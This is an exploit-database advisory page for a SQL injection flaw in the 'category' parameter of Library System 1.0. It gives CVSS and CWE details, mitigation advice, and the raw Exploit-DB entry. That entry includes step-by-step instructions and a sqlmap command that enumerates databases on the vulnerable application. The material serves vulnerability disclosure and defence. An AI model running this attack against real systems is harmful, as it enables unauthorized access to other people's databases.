header-logo
Suggest Exploit
vendor:
Library System
by:
Aitor Herrero
8.8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Library System
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:sourcecodester:library_system:1.0
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10 + XAMPP 7.4.4
2021

Library System 1.0 – ‘category’ SQL Injection

Library System 1.0 is vulnerable to SQL Injection. An attacker can exploit this vulnerability by sending malicious SQL queries to the application. To exploit this vulnerability, an attacker can send a malicious SQL query to the application via the 'category' parameter. For example, an attacker can send a malicious SQL query to the application via the URL http://localhost:8080/libsystem/libsystem/index.php?category=3 and then run sqlmap to exploit the vulnerability.

Mitigation:

Developers should use parameterized queries to prevent SQL injection attacks. Input validation should also be used to ensure that only valid data is accepted by the application.
Source

Exploit-DB raw data:

# Exploit Title: Library System 1.0 - 'category' SQL Injection
# Exploit Author: Aitor Herrero
# Date: 2021-01-22
# Vendor Homepage: https://www.sourcecodester.com/php/12275/library-system-using-php.html
# Software Link: https://www.sourcecodester.com/php/12275/library-system-using-php.html
# Version: 1.0
# Tested On: Windows 10 + XAMPP 7.4.4
# Description: Library System 1.0

#STEP 1 : Go to the principal main
#STEP 2 : Choose a category example :http://localhost:8080/libsystem/libsystem/index.php?category=3
#STEP 3: Run your sqlmap example:
sqlmap -u "http://localhost:8080/libsystem/libsystem/index.php?category=3" --dbs